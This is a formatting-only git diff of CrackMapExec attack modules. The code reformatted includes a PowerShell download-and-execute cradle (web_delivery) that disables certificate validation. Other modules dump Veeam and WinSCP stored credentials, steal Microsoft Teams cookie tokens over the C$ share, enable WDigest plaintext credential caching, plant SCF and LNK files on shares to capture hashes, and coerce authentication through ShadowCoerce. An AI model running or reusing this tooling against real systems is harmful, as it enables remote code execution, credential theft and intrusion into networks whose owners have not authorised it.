outdata.append( { "name": recordname, @@ -176,16 +161,9 @@ class CMEModule: "value": address.formatCanonical(), } ) - if dr["Type"] in [ - a - for a in RECORD_TYPE_MAPPING - if RECORD_TYPE_MAPPING[a] in ["CNAME", "NS", "PTR"] - ]: + if dr["Type"] in [a for a in RECORD_TYPE_MAPPING if RECORD_TYPE_MAPPING[a] in ["CNAME", "NS", "PTR"]]: address = DNS_RPC_RECORD_NODE_NAME(dr["Data"]) - if ( - str(recordname) != "DomainDnsZones" - and str(recordname) != "ForestDnsZones" - ): + if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones": outdata.append( { "name": recordname, @@ -195,10 +173,7 @@ class CMEModule: ) elif dr["Type"] == 28: address = DNS_RPC_RECORD_AAAA(dr["Data"]) - if ( - str(recordname) != "DomainDnsZones" - and str(recordname) != "ForestDnsZones" - ): + if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones": outdata.append( { "name": recordname, @@ -208,31 +183,18 @@ class CMEModule: ) context.log.highlight("Found %d records" % len(outdata)) - path = expanduser( - "~/.cme/logs/{}_network_{}.log".format( - connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S") - ) - ) + path = expanduser("~/.cme/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S"))) with codecs.open(path, "w", "utf-8") as outfile: for row in outdata: if self.showhosts: outfile.write("{}\n".format(row["name"] + "." + connection.domain)) elif self.showall: - outfile.write( - "{} \t {}\n".format( - row["name"] + "." + connection.domain, row["value"] - ) - ) + outfile.write("{} \t {}\n".format(row["name"] + "." + connection.domain, row["value"])) else: outfile.write("{}\n".format(row["value"])) context.log.success("Dumped {} records to {}".format(len(outdata), path)) if not self.showall and not self.showhosts: - context.log.display( - "To extract CIDR from the {} ip, run the following command: cat" - " your_file | mapcidr -aa -silent | mapcidr -a -silent".format( - len(outdata) - ) - ) + context.log.display("To extract CIDR from the {} ip, run the following command: cat" " your_file | mapcidr -aa -silent | mapcidr -a -silent".format(len(outdata))) class DNS_RECORD(Structure): @@ -414,8 +376,6 @@ class DNS_RPC_RECORD_TS(Structure): def toDatetime(self): microseconds = int(self["entombedTime"] / 10) try: - return datetime.datetime(1601, 1, 1) + datetime.timedelta( - microseconds=microseconds - ) + return datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=microseconds) except OverflowError: return None diff --git a/cme/modules/scuffy.py b/cme/modules/scuffy.py index cfece488..044ebb2b 100644 --- a/cme/modules/scuffy.py +++ b/cme/modules/scuffy.py @@ -70,23 +70,13 @@ class CMEModule: if not self.cleanup: with open(self.scf_path, "rb") as scf: try: - connection.conn.putFile( - share["name"], self.file_path, scf.read - ) - context.log.success( - f"Created SCF file on the {share['name']} share" - ) + connection.conn.putFile(share["name"], self.file_path, scf.read) + context.log.success(f"Created SCF file on the {share['name']} share") except Exception as e: - context.log.fail( - f"Error writing SCF file to share {share['name']}: {e}" - ) + context.log.fail(f"Error writing SCF file to share {share['name']}: {e}") else: try: connection.conn.deleteFile(share["name"], self.file_path) - context.log.success( - f"Deleted SCF file on the {share['name']} share" - ) + context.log.success(f"Deleted SCF file on the {share['name']} share") except Exception as e: - context.log.fail( - f"Error deleting SCF file on share {share['name']}: {e}" - ) + context.log.fail(f"Error deleting SCF file on share {share['name']}: {e}") diff --git a/cme/modules/shadowcoerce.py b/cme/modules/shadowcoerce.py index fe4a82d3..ca93ac54 100644 --- a/cme/modules/shadowcoerce.py +++ b/cme/modules/shadowcoerce.py @@ -45,9 +45,7 @@ class CMEModule: domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, - target=connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain, + target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain, pipe="FssagentRpc", doKerberos=connection.kerberos, dcHost=connection.kdcHost, @@ -64,9 +62,7 @@ class CMEModule: domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, - target=connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain, + target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain, pipe="FssagentRpc", ) @@ -86,9 +82,7 @@ class CMEModule: if result: context.log.highlight("VULNERABLE") - context.log.highlight( - "Next step: https://github.com/ShutdownRepo/ShadowCoerce" - ) + context.log.highlight("Next step: https://github.com/ShutdownRepo/ShadowCoerce") else: context.log.debug("Target not vulnerable to ShadowCoerce") @@ -211,9 +205,7 @@ class CoerceAuth: "UUID": ("a8e0653c-2744-4389-a61d-7373df8b2292", "1.0"), }, } - rpctransport = transport.DCERPCTransportFactory( - binding_params[pipe]["stringBinding"] - ) + rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"]) dce = rpctransport.get_dce_rpc() if hasattr(rpctransport, "set_credentials"): @@ -266,9 +258,7 @@ class CoerceAuth: dce.request(request) except Exception as e: cme_logger.debug("Something went wrong, check error status => %s", str(e)) - cme_logger.debug( - "Attack may of may not have worked, check your listener..." - ) + cme_logger.debug("Attack may of may not have worked, check your listener...") return False return True @@ -283,9 +273,7 @@ class CoerceAuth: dce.request(request) except Exception as e: cme_logger.debug("Something went wrong, check error status => %s", str(e)) - cme_logger.debug( - "Attack may of may not have worked, check your listener..." - ) + cme_logger.debug("Attack may of may not have worked, check your listener...") return False return True diff --git a/cme/modules/slinky.py b/cme/modules/slinky.py index 9f8d128b..ab631db9 100644 --- a/cme/modules/slinky.py +++ b/cme/modules/slinky.py @@ -69,23 +69,13 @@ class CMEModule: if not self.cleanup: with open(self.lnk_path, "rb") as lnk: try: - connection.conn.putFile( - share["name"], self.file_path, lnk.read - ) - context.log.success( - f"Created LNK file on the {share['name']} share" - ) + connection.conn.putFile(share["name"], self.file_path, lnk.read) + context.log.success(f"Created LNK file on the {share['name']} share") except Exception as e: - context.log.fail( - f"Error writing LNK file to share {share['name']}: {e}" - ) + context.log.fail(f"Error writing LNK file to share {share['name']}: {e}") else: try: connection.conn.deleteFile(share["name"], self.file_path) - context.log.success( - f"Deleted LNK file on the {share['name']} share" - ) + context.log.success(f"Deleted LNK file on the {share['name']} share") except Exception as e: - context.log.fail( - f"Error deleting LNK file on share {share['name']}: {e}" - ) + context.log.fail(f"Error deleting LNK file on share {share['name']}: {e}") diff --git a/cme/modules/spider_plus.py b/cme/modules/spider_plus.py index 12827b86..9d8c7ad1 100755 --- a/cme/modules/spider_plus.py +++ b/cme/modules/spider_plus.py @@ -43,9 +43,7 @@ def make_dirs(path): pass -get_list_from_option = lambda opt: list( - map(lambda o: o.lower(), filter(bool, opt.split(","))) -) +get_list_from_option = lambda opt: list(map(lambda o: o.lower(), filter(bool, opt.split(",")))) class SMBSpiderPlus: @@ -94,9 +92,7 @@ class SMBSpiderPlus: filelist = self.smb.conn.listPath(share, subfolder + "*") except SessionError as e: - self.logger.debug( - f'Failed listing files on share "{share}" in directory {subfolder}.' - ) + self.logger.debug(f'Failed listing files on share "{share}" in directory {subfolder}.') self.logger.debug(str(e)) if "STATUS_ACCESS_DENIED" in str(e): @@ -217,17 +213,11 @@ class SMBSpiderPlus: self.results[share][next_path] = { "size": humansize(result.get_filesize()), #'ctime': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(result.get_ctime())), - "ctime_epoch": time.strftime( - "%Y-%m-%d %H:%M:%S", time.localtime(result.get_ctime_epoch()) - ), + "ctime_epoch": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(result.get_ctime_epoch())), #'mtime': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(result.get_mtime())), - "mtime_epoch": time.strftime( - "%Y-%m-%d %H:%M:%S", time.localtime(result.get_mtime_epoch()) - ), + "mtime_epoch": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(result.get_mtime_epoch())), #'atime': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(result.get_atime())), - "atime_epoch": time.strftime( - "%Y-%m-%d %H:%M:%S", time.localtime(result.get_atime_epoch()) - ), + "atime_epoch": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(result.get_atime_epoch())), } # The collection logic is here. You can add more checks based @@ -237,17 +227,13 @@ class SMBSpiderPlus: # of a RemoteFile object that perform a remote connection. file_extension = next_path[next_path.rfind(".") + 1 :] if file_extension in self.exclude_exts: - self.logger.debug( - f'The file "{next_path}" has an excluded extension' - ) + self.logger.debug(f'The file "{next_path}" has an excluded extension') continue # If there is not results in the file but the size is correct, # then we save it if result.get_filesize() > self.max_file_size: - self.logger.debug( - f"File {result.get_longname()} has size {result.get_filesize()}" - ) + self.logger.debug(f"File {result.get_longname()} has size {result.get_filesize()}") continue ## You can add more checks here: date, ... @@ -318,9 +304,7 @@ class CMEModule: description = "List files on the target server (excluding `DIR` directories and `EXT` extensions) and save them to the `OUTPUT` directory if they are smaller then `SIZE`" supported_protocols = ["smb"] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? def options(self, context, module_options): """ @@ -332,16 +316,10 @@ class CMEModule: """ self.read_only = module_options.get("READ_ONLY", True) - self.exclude_exts = get_list_from_option( - module_options.get("EXCLUDE_EXTS", "ico,lnk") - ) - self.exlude_dirs = get_list_from_option( - module_options.get("EXCLUDE_DIR", "print$") - ) + self.exclude_exts = get_list_from_option(module_options.get("EXCLUDE_EXTS", "ico,lnk")) + self.exlude_dirs = get_list_from_option(module_options.get("EXCLUDE_DIR", "print$")) self.max_file_size = int(module_options.get("SIZE", 50 * 1024)) - self.output_folder = module_options.get( - "OUTPUT", os.path.join("/tmp", "cme_spider_plus") - ) + self.output_folder = module_options.get("OUTPUT", os.path.join("/tmp", "cme_spider_plus")) def on_login(self, context, connection): context.log.display("Started spidering plus with option:") diff --git a/cme/modules/spooler.py b/cme/modules/spooler.py index 5c169a2e..328d4d6b 100644 --- a/cme/modules/spooler.py +++ b/cme/modules/spooler.py @@ -51,14 +51,8 @@ class CMEModule: self.__stringbinding = KNOWN_PROTOCOLS[self.port]["bindstr"] % connection.host context.log.debug("StringBinding %s" % self.__stringbinding) rpctransport = transport.DCERPCTransportFactory(self.__stringbinding) - rpctransport.set_credentials( - connection.username, connection.password, connection.domain, lmhash, nthash - ) - rpctransport.setRemoteHost( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) + rpctransport.set_credentials(connection.username, connection.password, connection.domain, lmhash, nthash) + rpctransport.setRemoteHost(connection.host if not connection.kerberos else connection.hostname + "." + connection.domain) rpctransport.set_dport(self.port) if connection.kerberos: @@ -70,16 +64,8 @@ class CMEModule: error_text = "Protocol failed: %s" % e context.log.critical(error_text) - if ( - RPC_PROXY_INVALID_RPC_PORT_ERR in error_text - or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text - or RPC_PROXY_CONN_A1_404_ERR in error_text - or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text - ): - context.log.critical( - "This usually means the target does not allow " - "to connect to its epmapper using RpcProxy." - ) + if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or RPC_PROXY_CONN_A1_404_ERR in error_text or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text: + context.log.critical("This usually means the target does not allow " "to connect to its epmapper using RpcProxy.") return # Display results. @@ -91,13 +77,8 @@ class CMEModule: if (tmp_uuid in endpoints) is not True: endpoints[tmp_uuid] = {} endpoints[tmp_uuid]["Bindings"] = list() - if ( - uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] - in epm.KNOWN_UUIDS - ): - endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS[ - uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] - ] + if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] in epm.KNOWN_UUIDS: + endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18]] else: endpoints[tmp_uuid]["EXE"] = "N/A" endpoints[tmp_uuid]["annotation"] = entry["annotation"][:-1].decode("utf-8") @@ -112,9 +93,7 @@ class CMEModule: if "MS-RPRN" in endpoints[endpoint]["Protocol"]: context.log.debug("Protocol: %s " % endpoints[endpoint]["Protocol"]) context.log.debug("Provider: %s " % endpoints[endpoint]["EXE"]) - context.log.debug( - "UUID : %s %s" % (endpoint, endpoints[endpoint]["annotation"]) - ) + context.log.debug("UUID : %s %s" % (endpoint, endpoints[endpoint]["annotation"])) context.log.debug("Bindings: ") for binding in endpoints[endpoint]["Bindings"]: context.log.debug(" %s" % binding) diff --git a/cme/modules/subnets.py b/cme/modules/subnets.py index 9e6f475f..9ef589a7 100644 --- a/cme/modules/subnets.py +++ b/cme/modules/subnets.py @@ -29,15 +29,9 @@ class CMEModule: self.showservers = True if module_options and "SHOWSERVERS" in module_options: - if ( - module_options["SHOWSERVERS"].lower() == "true" - or module_options["SHOWSERVERS"] == "1" - ): + if module_options["SHOWSERVERS"].lower() == "true" or module_options["SHOWSERVERS"] == "1": self.showservers = True - elif ( - module_options["SHOWSERVERS"].lower() == "false" - or module_options["SHOWSERVERS"] == "0" - ): + elif module_options["SHOWSERVERS"].lower() == "false" or module_options["SHOWSERVERS"] == "0": self.showservers = False else: print("Could not parse showservers option.") @@ -75,23 +69,11 @@ class CMEModule: attributes=["distinguishedName", "name"], sizeLimit=999, ) - if ( - len( - [ - subnet - for subnet in list_subnets - if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) - ] - ) - == 0 - ): + if len([subnet for subnet in list_subnets if isinstance(subnet, ldapasn1_impacket.SearchResultEntry)]) == 0: context.log.highlight('Site "%s"' % site_name) else: for subnet in list_subnets: - if ( - isinstance(subnet, ldapasn1_impacket.SearchResultEntry) - is not True - ): + if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True: continue subnet = searchResEntry_to_dict(subnet) subnet_dn = subnet["distinguishedName"] @@ -105,35 +87,14 @@ class CMEModule: attributes=["cn"], sizeLimit=999, ) - if ( - len( - [ - server - for server in list_servers - if isinstance( - server, ldapasn1_impacket.SearchResultEntry - ) - ] - ) - == 0 - ): + if len([server for server in list_servers if isinstance(server, ldapasn1_impacket.SearchResultEntry)]) == 0: if len(site_description) != 0: - context.log.highlight( - 'Site "%s" (Subnet:%s) (description:"%s")' - % (site_name, subnet_name, site_description) - ) + context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description)) else: - context.log.highlight( - 'Site "%s" (Subnet:%s)' % (site_name, subnet_name) - ) + context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name)) else: for server in list_servers: - if ( - isinstance( - server, ldapasn1_impacket.SearchResultEntry - ) - is not True - ): + if isinstance(server, ldapasn1_impacket.SearchResultEntry) is not True: continue server = searchResEntry_to_dict(server)["cn"] if len(site_description) != 0: @@ -147,17 +108,9 @@ class CMEModule: ) ) else: - context.log.highlight( - 'Site "%s" (Subnet:%s) (Server:%s)' - % (site_name, subnet_name, server) - ) + context.log.highlight('Site "%s" (Subnet:%s) (Server:%s)' % (site_name, subnet_name, server)) else: if len(site_description) != 0: - context.log.highlight( - 'Site "%s" (Subnet:%s) (description:"%s")' - % (site_name, subnet_name, site_description) - ) + context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description)) else: - context.log.highlight( - 'Site "%s" (Subnet:%s)' % (site_name, subnet_name) - ) + context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name)) diff --git a/cme/modules/teams_localdb.py b/cme/modules/teams_localdb.py index af8dff1e..11d03798 100644 --- a/cme/modules/teams_localdb.py +++ b/cme/modules/teams_localdb.py @@ -23,9 +23,7 @@ class CMEModule: with open("/tmp/teams_cookies2.txt", "wb") as f: for path in paths: try: - connection.conn.getFile( - "C$", path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write - ) + connection.conn.getFile("C$", path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write) context.log.highlight("Found Cookie file in path " + path) found = 1 self.parse_file(context, "skypetoken_asm") @@ -36,9 +34,7 @@ class CMEModule: if "STATUS_SHARING_VIOLATION" in str(e): context.log.debug(str(e)) context.log.highlight("Found Cookie file in path " + path) - context.log.fail( - "Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database" - ) + context.log.fail("Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database") if found == 0: context.log.display("No cookie file found in Users folder") @@ -50,9 +46,7 @@ class CMEModule: c.execute("SELECT value FROM cookies WHERE name = '" + name + "'") row = c.fetchone() if row is None: - context.log.fail( - "No " + name + " present in Microsoft Teams Cookies database" - ) + context.log.fail("No " + name + " present in Microsoft Teams Cookies database") else: context.log.success("Succesfully extracted " + name + ": ") context.log.success(row[0]) diff --git a/cme/modules/uac.py b/cme/modules/uac.py index f17e9544..f57c731c 100644 --- a/cme/modules/uac.py +++ b/cme/modules/uac.py @@ -33,9 +33,7 @@ class CMEModule: "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ) keyHandle = ans["phkResult"] - dataType, uac_value = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "EnableLUA" - ) + dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "EnableLUA") if uac_value == 1: context.log.highlight("UAC Status: 1 (UAC Enabled)") diff --git a/cme/modules/user_desc.py b/cme/modules/user_desc.py index ae7a6010..bf127e18 100644 --- a/cme/modules/user_desc.py +++ b/cme/modules/user_desc.py @@ -53,19 +53,13 @@ class CMEModule: self.search_filter += f"(description={module_options['DESC_FILTER']})" if "DESC_INVERT" in module_options: - self.search_filter += ( - f"(!(description={module_options['DESC_INVERT']}))" - ) + self.search_filter += f"(!(description={module_options['DESC_INVERT']}))" if "USER_FILTER" in module_options: - self.search_filter += ( - f"(sAMAccountName={module_options['USER_FILTER']})" - ) + self.search_filter += f"(sAMAccountName={module_options['USER_FILTER']})" if "USER_INVERT" in module_options: - self.search_filter += ( - f"(!(sAMAccountName={module_options['USER_INVERT']}))" - ) + self.search_filter += f"(!(sAMAccountName={module_options['USER_INVERT']}))" self.search_filter += ")" @@ -80,12 +74,8 @@ class CMEModule: On successful LDAP login we perform a search for all user objects that have a description. Users can specify additional LDAP filters that are applied to the query. """ - self.create_log_file( - connection.conn.getRemoteHost(), datetime.now().strftime("%Y%m%d_%H%M%S") - ) - context.log.info( - f"Starting LDAP search with search filter '{self.search_filter}'" - ) + self.create_log_file(connection.conn.getRemoteHost(), datetime.now().strftime("%Y%m%d_%H%M%S")) + context.log.info(f"Starting LDAP search with search filter '{self.search_filter}'") try: sc = ldap.SimplePagedResultsControl() @@ -155,18 +145,14 @@ class CMEModule: description = attribute["vals"][0].asOctets().decode("utf-8") except Exception as e: entry = sAMAccountName or "item" - self.context.error( - f"Skipping {entry}, cannot process LDAP entry due to error: '{str(e)}'" - ) + self.context.error(f"Skipping {entry}, cannot process LDAP entry due to error: '{str(e)}'") if description and sAMAccountName not in self.account_names: self.desc_count += 1 self.append_to_log(sAMAccountName, description) if self.highlight(description): - self.context.log.highlight( - f"User: {sAMAccountName} - Description: {description}" - ) + self.context.log.highlight(f"User: {sAMAccountName} - Description: {description}") self.account_names.add(sAMAccountName) diff --git a/cme/modules/veeam_dump.py b/cme/modules/veeam_dump.py index 6dfbff32..b8c850cc 100644 --- a/cme/modules/veeam_dump.py +++ b/cme/modules/veeam_dump.py @@ -24,9 +24,7 @@ class CMEModule: multiple_hosts = True def __init__(self): - with open( - get_ps_script("veeam_dump_module/veeam-creds_dump.ps1"), "r" - ) as psFile: + with open(get_ps_script("veeam_dump_module/veeam-creds_dump.ps1"), "r") as psFile: self.psScript = psFile.read() def options(self, context, module_options): @@ -55,15 +53,9 @@ class CMEModule: ) keyHandle = ans["phkResult"] - SqlDatabase = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "SqlDatabaseName" - )[1].split("\x00")[:-1][0] - SqlInstance = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "SqlInstanceName" - )[1].split("\x00")[:-1][0] - SqlServer = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "SqlServerName" - )[1].split("\x00")[:-1][0] + SqlDatabase = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlDatabaseName")[1].split("\x00")[:-1][0] + SqlInstance = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlInstanceName")[1].split("\x00")[:-1][0] + SqlServer = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlServerName")[1].split("\x00")[:-1][0] except DCERPCException as e: if str(e).find("ERROR_FILE_NOT_FOUND"): @@ -84,23 +76,16 @@ class CMEModule: self.psScript = self.psScript.replace("REPLACE_ME_SqlServer", SqlServer) psScipt_b64 = b64encode(self.psScript.encode("UTF-16LE")).decode("utf-8") - output = connection.execute( - "powershell.exe -e {} -OutputFormat Text".format(psScipt_b64), True - ) + output = connection.execute("powershell.exe -e {} -OutputFormat Text".format(psScipt_b64), True) # Format ouput if returned in some XML Format if "CLIXML" in output: output = self.stripXmlOutput(context, output) # Stripping whitespaces and newlines - output_stripped = [ - " ".join(line.split()) for line in output.split("\r\n") if line.strip() - ] + output_stripped = [" ".join(line.split()) for line in output.split("\r\n") if line.strip()] # Error handling - if ( - "Can't connect to DB! Exiting..." in output_stripped - or "No passwords found!" in output_stripped - ): + if "Can't connect to DB! Exiting..." in output_stripped or "No passwords found!" in output_stripped: context.log.fail(output_stripped[0]) return @@ -109,14 +94,8 @@ class CMEModule: context.log.highlight(user + ":" + password) def on_admin_login(self, context, connection): - SqlDatabase, SqlInstance, SqlServer = self.checkVeeamInstalled( - context, connection - ) + SqlDatabase, SqlInstance, SqlServer = self.checkVeeamInstalled(context, connection) if SqlDatabase and SqlInstance and SqlServer: - context.log.success( - 'Found Veeam DB "{}" on SQL Server "{}\\{}"! Extracting stored credentials...'.format( - SqlDatabase, SqlServer, SqlInstance - ) - ) + context.log.success('Found Veeam DB "{}" on SQL Server "{}\\{}"! Extracting stored credentials...'.format(SqlDatabase, SqlServer, SqlInstance)) self.extractCreds(context, connection, SqlDatabase, SqlInstance, SqlServer) diff --git a/cme/modules/wdigest.py b/cme/modules/wdigest.py index 016f23c2..b4ac87e5 100644 --- a/cme/modules/wdigest.py +++ b/cme/modules/wdigest.py @@ -58,14 +58,10 @@ class CMEModule: 1, ) - rtype, data = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00" - ) + rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00") if int(data) == 1: - context.log.success( - "UseLogonCredential registry key created successfully" - ) + context.log.success("UseLogonCredential registry key created successfully") try: remoteOps.finish() @@ -111,9 +107,7 @@ class CMEModule: "UseLogonCredential\x00", ) except DCERPCException: - context.log.success( - "UseLogonCredential registry key deleted successfully" - ) + context.log.success("UseLogonCredential registry key deleted successfully") try: remoteOps.finish() diff --git a/cme/modules/web_delivery.py b/cme/modules/web_delivery.py index d1ef7a80..c26ee3ba 100644 --- a/cme/modules/web_delivery.py +++ b/cme/modules/web_delivery.py @@ -38,9 +38,7 @@ class CMEModule: self.payload = module_options["PAYLOAD"] def on_admin_login(self, context, connection): - ps_command = """[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{}');""".format( - self.url - ) + ps_command = """[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{}');""".format(self.url) if self.payload == "32": connection.ps_execute(ps_command, force_ps32=True) else: diff --git a/cme/modules/webdav.py b/cme/modules/webdav.py index f5bea23a..81e6f0fa 100644 --- a/cme/modules/webdav.py +++ b/cme/modules/webdav.py @@ -36,9 +36,7 @@ class CMEModule: that the WebClient service is running on the target. """ try: - remote_file = RemoteFile( - connection.conn, "DAV RPC Service", "IPC$", access=FILE_READ_DATA - ) + remote_file = RemoteFile(connection.conn, "DAV RPC Service", "IPC$", access=FILE_READ_DATA) remote_file.open() remote_file.close() diff --git a/cme/modules/whoami.py b/cme/modules/whoami.py index 7265fc25..3b7b86f1 100644 --- a/cme/modules/whoami.py +++ b/cme/modules/whoami.py @@ -8,9 +8,7 @@ class CMEModule: description = "Get details of provided user" supported_protocols = ["ldap"] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? def options(self, context, module_options): """ @@ -27,9 +25,7 @@ class CMEModule: else: searchFilter = f"(sAMAccountName={format(self.username)})" - context.log.debug( - f"Using naming context: {searchBase} and {searchFilter} as search filter" - ) + context.log.debug(f"Using naming context: {searchBase} and {searchFilter} as search filter") # Get attributes of provided user r = connection.ldapConnection.search( @@ -72,9 +68,7 @@ class CMEModule: for group in response["vals"]: context.log.highlight(f"Member of: {group}") elif "servicePrincipalName" in str(response["type"]): - context.log.highlight( - f"Service Account Name(s) found - Potentially Kerberoastable user!" - ) + context.log.highlight(f"Service Account Name(s) found - Potentially Kerberoastable user!") for spn in response["vals"]: context.log.highlight(f"Service Account Name: {spn}") else: diff --git a/cme/modules/winscp_dump.py b/cme/modules/winscp_dump.py index 65e14540..99fd89a9 100644 --- a/cme/modules/winscp_dump.py +++ b/cme/modules/winscp_dump.py @@ -70,14 +70,11 @@ class CMEModule: ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, - "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" - + userObject, + "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" + userObject, ) keyHandle = ans["phkResult"] - userProfilePath = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath" - )[1].split("\x00")[:-1][0] + userProfilePath = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath")[1].split("\x00")[:-1][0] rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) self.userDict[userObject] = userProfilePath.split("\\")[-1] finally: @@ -144,24 +141,14 @@ class CMEModule: ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, - userObject - + "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\" - + sessionName, + userObject + "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\" + sessionName, ) keyHandle = ans["phkResult"] - hostName = unquote( - rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "HostName" - )[1].split("\x00")[:-1][0] - ) - userName = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "UserName" - )[1].split("\x00")[:-1][0] + hostName = unquote(rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "HostName")[1].split("\x00")[:-1][0]) + userName = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UserName")[1].split("\x00")[:-1][0] try: - password = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "Password" - )[1].split("\x00")[:-1][0] + password = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "Password")[1].split("\x00")[:-1][0] except: context.log.debug("Session found but no Password is stored!") password = "" @@ -203,11 +190,7 @@ class CMEModule: # Get User Names userNames = [] for i in range(users): - userNames.append( - rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)[ - "lpNameOut" - ].split("\x00")[:-1][0] - ) + userNames.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0]) rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) # Filter legit users in regex @@ -247,11 +230,7 @@ class CMEModule: # Get User Names for i in range(users): - userObjects.append( - rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)[ - "lpNameOut" - ].split("\x00")[:-1][0] - ) + userObjects.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0]) rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) except: context.log.fail("Error handling Users in registry") @@ -276,23 +255,18 @@ class CMEModule: ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, - "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" - + userObject, + "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" + userObject, ) keyHandle = ans["phkResult"] - userProfilePath = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath" - )[1].split("\x00")[:-1][0] + userProfilePath = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath")[1].split("\x00")[:-1][0] rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) # Load Profile ans = 